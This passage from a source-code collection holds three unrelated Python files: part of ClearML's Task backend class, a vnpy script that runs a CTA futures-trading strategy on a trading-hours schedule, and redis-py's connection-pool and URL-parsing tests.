self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we are using forced update, make sure the task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags', 'runtime') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# make sure we have str as values:
for key in requirements.keys():
if requirements[key] and not isinstance(requirements[key], str):
requirements[key] = '\n'.join(requirements[key])
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[Mapping, list]]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# make sure we have either dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string).
return None if configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as dictionary.
return None if configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New name for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional tags for the new task
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts except input artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
            .. code-block:: python

                status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
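    # Usage sketch (field values are placeholders): the kwargs are forwarded verbatim
    # to tasks.GetAllRequest, so any filter the backend request supports can be passed.
    #
    #   res = Task.get_all(status=['completed'], project=['<project-id>'],
    #                      only_fields=['id', 'name'])
    #   completed_ids = [t.id for t in res.response.tasks]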
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
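    # Example sketch: with the default unique_selector (itemgetter("url")) this
    # returns the distinct URLs referenced by the task's events, which is handy for
    # collecting reported debug samples, e.g.
    #
    #   urls = task._get_all_events(max_events=None, event_type='training_debug_image')
    #
    # ('training_debug_image' is an assumption used here for illustration; pass
    # event_type=None to retrieve every event type, as the docstring notes.)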
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Optional[Union[str, Task]]) -> None
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_pid, _, master_task_id = PROC_MASTER_ID_ENV_VAR.get('').partition(':')
# we could not find a task ID, revert to old stub behaviour
if not master_task_id:
return None
return master_task_id
@classmethod
def __get_master_process_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[0]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
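    # Note on the three helpers above: PROC_MASTER_ID_ENV_VAR stores a single
    # "<master-pid>:<master-task-id>" string (e.g. "12345:abc123..."), so
    # __get_master_process_id() returns the part before the colon,
    # __get_master_id_task_id() returns the part after it, and __is_subprocess()
    # simply compares the stored pid against os.getpid() of the current process.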
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> None
"""
Set offline mode, where all data and logs are stored into local folder, for later transmission
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return offline-mode state, If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
runCtaTrading.py
|
# encoding: UTF-8
from __future__ import print_function
import sys
try:
reload(sys) # Python 2
sys.setdefaultencoding('utf8')
except NameError:
pass # Python 3
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
from vnpy.trader.app.ctaStrategy import strategy
from MSDstrategy import MSDStrategy
strategy.STRATEGY_CLASS['MSDStrategy'] = MSDStrategy
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
处理错误事件
错误信息在每次登陆后,会将当日所有已产生的均推送一遍,所以不适合写入日志
"""
error = event.dict_['data']
print(u'错误代码:%s,错误信息:%s' %(error.errorID, error.errorMsg))
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
    # Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
    le.info(u'Starting the CTA strategy child process')
ee = EventEngine2()
    le.info(u'Event engine created successfully')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(ctaStrategy)
    le.info(u'Main engine created successfully')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
    le.info(u'Registered log event listeners')
me.connect('CTP')
    le.info(u'Connecting to the CTP gateway')
    sleep(10)                      # wait for the CTP gateway to finish initializing
    me.dataEngine.saveContracts()  # save contract information to file
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
    le.info(u'CTA strategy settings loaded successfully')
cta.initAll()
    le.info(u'CTA strategies initialized successfully')
cta.startAll()
    le.info(u'CTA strategies started successfully')
#l = cta.strategyDict['MSD']
#l.buy(200,1)
#l.sell(300,1)
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
    le.info(u'Starting the CTA strategy guardian parent process')
    DAY_START = time(8, 45)       # day-session start and stop times
DAY_END = time(15, 30)
    NIGHT_START = time(20, 45)    # night-session start and stop times
NIGHT_END = time(2, 45)
    p = None        # handle of the child process
while True:
currentTime = datetime.now().time()
recording = False
        # Determine which trading session the current time falls in
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
        # During trading hours the child process must be running
        if recording and p is None:
            le.info(u'Starting the child process')
p = multiprocessing.Process(target=runChildProcess)
p.start()
            le.info(u'Child process started successfully')
        # Outside trading hours the child process is shut down
        if not recording and p is not None:
            le.info(u'Stopping the child process')
p.terminate()
p.join()
p = None
            le.info(u'Child process stopped successfully')
sleep(5)
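    # Worked example of the session check above: the night session wraps past
    # midnight, so it is split into two conditions. At 23:10 only
    # (currentTime >= NIGHT_START) holds, so recording is True; at 03:00 neither
    # night condition holds (03:00 > NIGHT_END of 02:45) and the day window has not
    # started, so recording is False and any running child process is terminated
    # until DAY_START at 08:45.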
if __name__ == '__main__':
runChildProcess()
    # Although this also enables unattended operation, a manual check at every daily start-up is strongly recommended; you are responsible for your own PnL.
#runParentProcess()
|
test_connection_pool.py
|
import os
import pytest
import redis
import time
import re
from threading import Thread
from redis.connection import ssl_available, to_bool
from .conftest import skip_if_server_version_lt
class DummyConnection(object):
description_format = "DummyConnection<>"
def __init__(self, **kwargs):
self.kwargs = kwargs
self.pid = os.getpid()
def connect(self):
pass
def is_ready_for_command(self):
return True
class TestConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=None,
connection_class=redis.Connection):
connection_kwargs = connection_kwargs or {}
pool = redis.ConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
**connection_kwargs)
return pool
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=DummyConnection)
connection = pool.get_connection('_')
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
c2 = pool.get_connection('_')
assert c1 != c2
def test_max_connections(self):
pool = self.get_pool(max_connections=2)
pool.get_connection('_')
pool.get_connection('_')
with pytest.raises(redis.ConnectionError):
pool.get_connection('_')
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
pool.release(c1)
c2 = pool.get_connection('_')
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
connection_kwargs = {'host': 'localhost', 'port': 6379, 'db': 1}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.Connection)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=1,' \
'client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_tcp_wname(self):
connection_kwargs = {'host': 'localhost', 'port': 6379, 'db': 1,
'client_name': 'testing'}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.Connection)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=1,' \
'client_name=testing>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
connection_kwargs = {'path': '/abc', 'db': 1}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.UnixDomainSocketConnection)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=/abc,' \
'db=1,client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_unix_wname(self):
connection_kwargs = {'path': '/abc', 'db': 1, 'client_name': 'testing'}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.UnixDomainSocketConnection)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=/abc,' \
'db=1,client_name=testing>>'
assert repr(pool) == expected
class TestBlockingConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=10, timeout=20):
connection_kwargs = connection_kwargs or {}
pool = redis.BlockingConnectionPool(connection_class=DummyConnection,
max_connections=max_connections,
timeout=timeout,
**connection_kwargs)
return pool
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection('_')
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
c2 = pool.get_connection('_')
assert c1 != c2
def test_connection_pool_blocks_until_timeout(self):
"When out of connections, block for timeout seconds, then raise"
pool = self.get_pool(max_connections=1, timeout=0.1)
pool.get_connection('_')
start = time.time()
with pytest.raises(redis.ConnectionError):
pool.get_connection('_')
# we should have waited at least 0.1 seconds
assert time.time() - start >= 0.1
    def test_connection_pool_blocks_until_another_connection_released(self):
"""
When out of connections, block until another connection is released
to the pool
"""
pool = self.get_pool(max_connections=1, timeout=2)
c1 = pool.get_connection('_')
def target():
time.sleep(0.1)
pool.release(c1)
Thread(target=target).start()
start = time.time()
pool.get_connection('_')
assert time.time() - start >= 0.1
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
pool.release(c1)
c2 = pool.get_connection('_')
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=0,' \
'client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_tcp_wname(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0,
client_name='testing')
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=0,' \
'client_name=testing>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path='abc',
db=0,
)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=abc,db=0,' \
'client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_unix_wname(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path='abc',
db=0,
client_name='testing',
)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=abc,db=0,' \
'client_name=testing>>'
assert repr(pool) == expected
class TestConnectionPoolURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('redis://localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_hostname(self):
pool = redis.ConnectionPool.from_url('redis://myhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_quoted_hostname(self):
pool = redis.ConnectionPool.from_url('redis://my %2F host %2B%3D+',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'my / host +=+',
'port': 6379,
'db': 0,
'password': None,
}
def test_port(self):
pool = redis.ConnectionPool.from_url('redis://localhost:6380')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6380,
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('redis://:mypassword@localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': 'mypassword',
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
'redis://:%2Fmypass%2F%2B word%3D%24+@localhost',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': '/mypass/+ word=$+',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('redis://localhost', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 1,
'password': None,
}
def test_db_in_path(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2?db=3',
db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 3,
'password': None,
}
def test_extra_typed_querystring_options(self):
pool = redis.ConnectionPool.from_url(
'redis://localhost/2?socket_timeout=20&socket_connect_timeout=10'
'&socket_keepalive=&retry_on_timeout=Yes&max_connections=10'
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'socket_timeout': 20.0,
'socket_connect_timeout': 10.0,
'retry_on_timeout': True,
'password': None,
}
assert pool.max_connections == 10
def test_boolean_parsing(self):
for expected, value in (
(None, None),
(None, ''),
(False, 0), (False, '0'),
(False, 'f'), (False, 'F'), (False, 'False'),
(False, 'n'), (False, 'N'), (False, 'No'),
(True, 1), (True, '1'),
(True, 'y'), (True, 'Y'), (True, 'Yes'),
):
assert expected is to_bool(value)
def test_invalid_extra_typed_querystring_options(self):
import warnings
with warnings.catch_warnings(record=True) as warning_log:
redis.ConnectionPool.from_url(
'redis://localhost/2?socket_timeout=_&'
'socket_connect_timeout=abc'
)
# Compare the message values
assert [
str(m.message) for m in
sorted(warning_log, key=lambda l: str(l.message))
] == [
'Invalid value for `socket_connect_timeout` in connection URL.',
'Invalid value for `socket_timeout` in connection URL.',
]
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('redis://localhost?a=1&b=2')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
def test_calling_from_subclass_returns_correct_instance(self):
pool = redis.BlockingConnectionPool.from_url('redis://localhost')
assert isinstance(pool, redis.BlockingConnectionPool)
def test_client_creates_connection_pool(self):
r = redis.Redis.from_url('redis://myhost')
assert r.connection_pool.connection_class == redis.Connection
assert r.connection_pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_invalid_scheme_raises_error(self):
with pytest.raises(ValueError):
redis.ConnectionPool.from_url('localhost')
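# Quick reference sketch for the URL forms exercised above (host/password/db values
# are placeholders): the scheme selects the connection class (redis://, rediss://,
# unix://), the path or a ?db= query option selects the database, and any extra
# query options are forwarded to the connection as keyword arguments, with known
# typed options (socket_timeout, retry_on_timeout, max_connections, ...) coerced.
#
#   pool = redis.ConnectionPool.from_url(
#       'redis://:secret@redis.example.com:6380/2?socket_timeout=5')
#   r = redis.Redis(connection_pool=pool)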
class TestConnectionPoolUnixSocketURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('unix:///socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('unix://:mypassword@/socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': 'mypassword',
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
'unix://:%2Fmypass%2F%2B word%3D%24+@/socket',
decode_components=True)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': '/mypass/+ word=$+',
}
def test_quoted_path(self):
pool = redis.ConnectionPool.from_url(
'unix://:mypassword@/my%2Fpath%2Fto%2F..%2F+_%2B%3D%24ocket',
decode_components=True)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/my/path/to/../+_+=$ocket',
'db': 0,
'password': 'mypassword',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('unix:///socket', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 1,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('unix:///socket?db=2', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 2,
'password': None,
}
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('unix:///socket?a=1&b=2')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
class TestSSLConnectionURLParsing(object):
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_defaults(self):
pool = redis.ConnectionPool.from_url('rediss://localhost')
assert pool.connection_class == redis.SSLConnection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_cert_reqs_options(self):
import ssl
class DummyConnectionPool(redis.ConnectionPool):
def get_connection(self, *args, **kwargs):
return self.make_connection()
pool = DummyConnectionPool.from_url(
'rediss://?ssl_cert_reqs=none')
assert pool.get_connection('_').cert_reqs == ssl.CERT_NONE
pool = DummyConnectionPool.from_url(
'rediss://?ssl_cert_reqs=optional')
assert pool.get_connection('_').cert_reqs == ssl.CERT_OPTIONAL
pool = DummyConnectionPool.from_url(
'rediss://?ssl_cert_reqs=required')
assert pool.get_connection('_').cert_reqs == ssl.CERT_REQUIRED
class TestConnection(object):
def test_on_connect_error(self):
"""
An error in Connection.on_connect should disconnect from the server
see for details: https://github.com/andymccurdy/redis-py/issues/368
"""
# this assumes the Redis server being tested against doesn't have
# 9999 databases ;)
bad_connection = redis.Redis(db=9999)
# an error should be raised on connect
with pytest.raises(redis.RedisError):
bad_connection.info()
pool = bad_connection.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_disconnects_socket(self, r):
"""
If Redis raises a LOADING error, the connection should be
disconnected and a BusyLoadingError raised
"""
with pytest.raises(redis.BusyLoadingError):
r.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
pool = r.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline_immediate_command(self, r):
"""
BusyLoadingErrors should raise from Pipelines that execute a
command immediately, like WATCH does.
"""
pipe = r.pipeline()
with pytest.raises(redis.BusyLoadingError):
pipe.immediate_execute_command('DEBUG', 'ERROR',
'LOADING fake message')
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline(self, r):
"""
BusyLoadingErrors should be raised from a pipeline execution
regardless of the raise_on_error flag.
"""
pipe = r.pipeline()
pipe.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
with pytest.raises(redis.BusyLoadingError):
pipe.execute()
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_read_only_error(self, r):
"READONLY errors get turned in ReadOnlyError exceptions"
with pytest.raises(redis.ReadOnlyError):
r.execute_command('DEBUG', 'ERROR', 'READONLY blah blah')
def test_connect_from_url_tcp(self):
